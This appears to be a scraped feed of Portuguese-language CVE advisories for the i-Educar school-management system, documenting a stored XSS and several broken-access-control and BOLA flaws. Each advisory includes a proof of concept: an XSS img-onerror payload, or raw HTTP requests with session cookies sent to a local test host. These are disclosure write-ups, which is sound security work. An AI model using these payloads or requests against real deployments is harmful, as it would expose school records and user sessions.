src="/p/cve-2025-10372/image.png" width="583" height="230" srcset="/p/cve-2025-10372/image_hu_11b4ec969d3cf5a8.png 480w, /p/cve-2025-10372/image_hu_280822500865c396.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="253" data-flex-basis="608px" /></p> <p><img src="/p/cve-2025-10372/image-1.png" width="572" height="231" srcset="/p/cve-2025-10372/image-1_hu_372cc54d6686bae9.png 480w, /p/cve-2025-10372/image-1_hu_69fa88ac3e05bf85.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="247" data-flex-basis="594px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10372.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10372.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sat, 13 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-10373/ https://www.cvehunters.com/pt/p/cve-2025-10373/ <h2 id="cve-2025-10373-cross-site-scripting-xss-armazenado-no-endpoint-educar_turma_tipo_cadphp-parâmetro-nm_tipo">CVE-2025-10373: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_turma_tipo_cad.php</code> parâmetro <code>nm_tipo</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10373" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10373</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_turma_tipo_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nm_tipo</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_turma_tipo_cad.php</code></p><h2 id="cve-2025-10373-cross-site-scripting-xss-armazenado-no-endpoint-educar_turma_tipo_cadphp-parâmetro-nm_tipo">CVE-2025-10373: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_turma_tipo_cad.php</code> parâmetro <code>nm_tipo</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10373" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10373</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_turma_tipo_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nm_tipo</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_turma_tipo_cad.php</code></p> <p>Parâmetro: <code>nm_tipo</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>nm_tipo</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10373/image.png" width="560" height="214" srcset="/p/cve-2025-10373/image_hu_74dab14fb73dfe41.png 480w, /p/cve-2025-10373/image_hu_76923e2a7dc46c82.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="261" data-flex-basis="628px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10373.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10373.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sat, 13 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-10070/ https://www.cvehunters.com/pt/p/cve-2025-10070/ <h2 id="cve-2025-10070-controle-de-acesso-quebrado-no-endpoint-enturmacao-em-loteid">CVE-2025-10070: Controle de Acesso Quebrado no Endpoint <code>/enturmacao-em-lote/[ID]</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10070" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10070</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint <code>/enturmacao-em-lote/[ID]</code> do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"><b>Endpoint Vulnerável:</b> <code>GET /enturmacao-em-lote/[ID]</code></br><b>Autenticação:</b> Obrigatória</br></br>O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .</p><h2 id="cve-2025-10070-controle-de-acesso-quebrado-no-endpoint-enturmacao-em-loteid">CVE-2025-10070: Controle de Acesso Quebrado no Endpoint <code>/enturmacao-em-lote/[ID]</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10070" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10070</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint <code>/enturmacao-em-lote/[ID]</code> do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"><b>Endpoint Vulnerável:</b> <code>GET /enturmacao-em-lote/[ID]</code></br><b>Autenticação:</b> Obrigatória</br></br>O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .</p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Autenticar como um usuário sem privilégios.</li></ul></p> <p><img src="/p/cve-2025-10070/image.png" width="1843" height="533" srcset="/p/cve-2025-10070/image_hu_5ca2ea85ab6696dd.png 480w, /p/cve-2025-10070/image_hu_deb570b2049417e1.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="345" data-flex-basis="829px" /></p> <p><img src="/p/cve-2025-10070/image-1.png" width="936" height="436" srcset="/p/cve-2025-10070/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-10070/image-1_hu_f205df0666d7bd3a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="214" data-flex-basis="515px" /></p> <p style="text-align: justify;"><ul><li>Enviar a seguinte solicitação:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">GET /enturmacao-em-lote/15 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Cookie: i_educar_session=ikrAPvWjSx0V5drm82zlgu1kBByJdsCx1gJkiwsu </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: none </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"><ul><li>Podemos observar que temos acesso à página e à função para atribuir alunos em lote às turmas. E este usuário não deveria fazer isso.</li></ul></p> <p><img src="/p/cve-2025-10070/image-2.png" width="1556" height="667" srcset="/p/cve-2025-10070/image-2_hu_9bc692092386d63c.png 480w, /p/cve-2025-10070/image-2_hu_8c43eda558b10780.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="233" data-flex-basis="559px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo: <ul> <li>Acesso não autorizado a funcionalidades restritas;</li> <li>Escalonamento de privilégios para usuários de baixo nível;</li> <li>Exposição de dados sensíveis e potencial comprometimento do sistema;</li> <li>Perda de confidencialidade e integridade de registros educacionais;</li> <li>Danos à reputação da organização.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10070.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10070.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 07 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-10071/ https://www.cvehunters.com/pt/p/cve-2025-10071/ <h2 id="cve-2025-10071-controle-de-acesso-quebrado-no-endpoint-cancelar-enturmacao-em-loteid">CVE-2025-10071: Controle de Acesso Quebrado no Endpoint <code>/cancelar-enturmacao-em-lote/[ID]</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10071" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10071</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint <code>/cancelar-enturmacao-em-lote/[ID]</code> do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"><b>Endpoint Vulnerável:</b> <code>GET /cancelar-enturmacao-em-lote/[ID]</code></br><b>Autenticação:</b> Obrigatória</br></br>O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .</p><h2 id="cve-2025-10071-controle-de-acesso-quebrado-no-endpoint-cancelar-enturmacao-em-loteid">CVE-2025-10071: Controle de Acesso Quebrado no Endpoint <code>/cancelar-enturmacao-em-lote/[ID]</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10071" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10071</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint <code>/cancelar-enturmacao-em-lote/[ID]</code> do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"><b>Endpoint Vulnerável:</b> <code>GET /cancelar-enturmacao-em-lote/[ID]</code></br><b>Autenticação:</b> Obrigatória</br></br>O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .</p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Autenticar como um usuário sem privilégios.</li></ul></p> <p><img src="/p/cve-2025-10071/image.png" width="1843" height="533" srcset="/p/cve-2025-10071/image_hu_5ca2ea85ab6696dd.png 480w, /p/cve-2025-10071/image_hu_deb570b2049417e1.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="345" data-flex-basis="829px" /></p> <p><img src="/p/cve-2025-10071/image-1.png" width="936" height="436" srcset="/p/cve-2025-10071/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-10071/image-1_hu_f205df0666d7bd3a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="214" data-flex-basis="515px" /></p> <p style="text-align: justify;"><ul><li>Enviar a seguinte solicitação:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">GET /cancelar-enturmacao-em-lote/15 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/enturmacao-em-lote/15 </span></span><span class="line"><span class="cl">Cookie: i_educar_session=ikrAPvWjSx0V5drm82zlgu1kBByJdsCx1gJkiwsu </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"><ul><li>Podemos observar que temos acesso à página e à função para atribuir alunos em lote às turmas. E este usuário não deveria fazer isso.</li></ul></p> <p><img src="/p/cve-2025-10071/image-2.png" width="1573" height="669" srcset="/p/cve-2025-10071/image-2_hu_c622a1c3b8276d3c.png 480w, /p/cve-2025-10071/image-2_hu_f4790faff4a3d16.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="235" data-flex-basis="564px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo: <ul> <li>Acesso não autorizado a funcionalidades restritas;</li> <li>Escalonamento de privilégios para usuários de baixo nível;</li> <li>Exposição de dados sensíveis e potencial comprometimento do sistema;</li> <li>Perda de confidencialidade e integridade de registros educacionais;</li> <li>Danos à reputação da organização.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10071.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10071.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 07 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-10072/ https://www.cvehunters.com/pt/p/cve-2025-10072/ <h2 id="cve-2025-10072-controle-de-acesso-quebrado-no-endpoint-matriculaid_studententurmarid_class">CVE-2025-10072: Controle de Acesso Quebrado no Endpoint <code>/matricula/[ID_STUDENT]/enturmar/[ID_CLASS]</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10072" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10072</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint <code>/matricula/[ID_STUDENT]/enturmar/[ID_CLASS]</code> do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"><b>Endpoint Vulnerável:</b> <code>GET /matricula/[ID_STUDENT]/enturmar/[ID_CLASS]</code></br><b>Autenticação:</b> Obrigatória</br></br>O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .</p><h2 id="cve-2025-10072-controle-de-acesso-quebrado-no-endpoint-matriculaid_studententurmarid_class">CVE-2025-10072: Controle de Acesso Quebrado no Endpoint <code>/matricula/[ID_STUDENT]/enturmar/[ID_CLASS]</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10072" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10072</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint <code>/matricula/[ID_STUDENT]/enturmar/[ID_CLASS]</code> do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"><b>Endpoint Vulnerável:</b> <code>GET /matricula/[ID_STUDENT]/enturmar/[ID_CLASS]</code></br><b>Autenticação:</b> Obrigatória</br></br>O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .</p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Autenticar como um usuário sem privilégios.</li></ul></p> <p><img src="/p/cve-2025-10072/image.png" width="1843" height="533" srcset="/p/cve-2025-10072/image_hu_5ca2ea85ab6696dd.png 480w, /p/cve-2025-10072/image_hu_deb570b2049417e1.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="345" data-flex-basis="829px" /></p> <p><img src="/p/cve-2025-10072/image-1.png" width="936" height="436" srcset="/p/cve-2025-10072/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-10072/image-1_hu_f205df0666d7bd3a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="214" data-flex-basis="515px" /></p> <p style="text-align: justify;"><ul><li>Enviar a seguinte solicitação:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">GET /matricula/206/enturmar/23 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/intranet/educar_matricula_turma_lst.php?ref_cod_matricula=206<span class="err">&</span>ano_letivo=2025 </span></span><span class="line"><span class="cl">Cookie: i_educar_session=Mz9IKWGOP641g4BLkSGRnxs69wk4ChmUUxUerX19 </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"><ul><li>Podemos observar que temos acesso à página e à função de cadastrar alunos nas turmas. E este usuário não deveria fazer isso.</li></ul></p> <p><img src="/p/cve-2025-10072/image-2.png" width="1555" height="666" srcset="/p/cve-2025-10072/image-2_hu_d70819db70f9d571.png 480w, /p/cve-2025-10072/image-2_hu_b5fb0c0419366edd.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="233" data-flex-basis="560px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo: <ul> <li>Acesso não autorizado a funcionalidades restritas;</li> <li>Escalonamento de privilégios para usuários de baixo nível;</li> <li>Exposição de dados sensíveis e potencial comprometimento do sistema;</li> <li>Perda de confidencialidade e integridade de registros educacionais;</li> <li>Danos à reputação da organização.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10072.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10072.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 07 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-10073/ https://www.cvehunters.com/pt/p/cve-2025-10073/ <h2 id="cve-2025-10073-broken-object-level-authorization-bola-permite-a-enumeração-de-dados-de-classes-via-moduleapiturma">CVE-2025-10073: Broken Object Level Authorization (BOLA) permite a enumeração de dados de classes via <code>/module/Api/turma</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10073" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10073</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Broken Object Level Authorization (BOLA) foi identificada no endpoint <code>/module/Api/turma</code> do aplicativo i-Educar. Essa falha permite que um usuário sem as devidas permissões consulte o endpoint e recupere ** informações da turma** manipulando parâmetros de solicitação.</br></br>Embora essa vulnerabilidade não exponha diretamente dados individuais de alunos, ela ainda constitui uma <b>divulgação não autorizada de informações de estrutura acadêmica</b>, que pode ser aproveitada para enumeração ou como um trampolim para ataques futuros.</p><h2 id="cve-2025-10073-broken-object-level-authorization-bola-permite-a-enumeração-de-dados-de-classes-via-moduleapiturma">CVE-2025-10073: Broken Object Level Authorization (BOLA) permite a enumeração de dados de classes via <code>/module/Api/turma</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10073" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10073</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Broken Object Level Authorization (BOLA) foi identificada no endpoint <code>/module/Api/turma</code> do aplicativo i-Educar. Essa falha permite que um usuário sem as devidas permissões consulte o endpoint e recupere ** informações da turma** manipulando parâmetros de solicitação.</br></br>Embora essa vulnerabilidade não exponha diretamente dados individuais de alunos, ela ainda constitui uma <b>divulgação não autorizada de informações de estrutura acadêmica</b>, que pode ser aproveitada para enumeração ou como um trampolim para ataques futuros.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"><b>Endpoint vulnerável:</b> <code>GET /module/Api/turma</code></br></br>O aplicativo não consegue aplicar a <b>autorização em nível de objeto</b> ao manipular este endpoint. Como resultado, qualquer usuário autenticado pode manipular os valores da solicitação para acessar informações confidenciais (nomes, IDs, status de matrícula) dos alunos.</p> <p style="text-align: justify;"><b>Comportamento esperado:</b><ul><li>Somente funções autorizadas (por exemplo, administradores, coordenadores, professores vinculados à turma) devem ter acesso a esses dados.</li><li>Usuários 